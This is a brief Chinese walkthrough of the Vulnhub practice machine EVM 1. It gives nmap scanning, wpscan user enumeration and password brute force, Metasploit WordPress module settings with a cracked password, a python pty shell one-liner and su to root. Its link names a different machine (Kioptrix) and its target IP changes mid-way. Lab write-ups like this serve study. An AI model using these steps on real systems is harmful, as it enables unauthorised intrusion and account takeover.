Vulnhub—靶机—EVM 1
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
一、信息收集
【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.43.121
【步骤二】访问80端口web页面:
【步骤三】对80端口进行目录枚举
【分析】结合主页及目录枚举,确认存在wordpress系统
【步骤四】使用wpscan扫描用户
【命令】wpscan --url http://192.168.43.121/wordpress/ -eu
【分析】扫描发现当前版本是5.2.4 用户为c0rrupt3d_brain
【步骤五】对用户密码进行爆破
【命令】wpscan --url http://192.168.43.121/wordpress/ -U c0rrupt3d_brain -P /home/passwd.txt
二、漏洞利用
【步骤六】利用用户名密码结合msf的wordprss漏洞模块进行攻击
【命令】
set rhosts 192.168.40.138
set username c0rrupt3d_brain
set password 24992499
set targeturi /wordpress
run
【步骤七】内部信息收集
【分析】在home下隐藏文件中发现疑似root密码
【步骤八】使用python获取交互式shell
【命令】python -c ‘import pty;pty.spawn("/bin/bash")’
【步骤九】使用su切换root
三、Flag
【flag】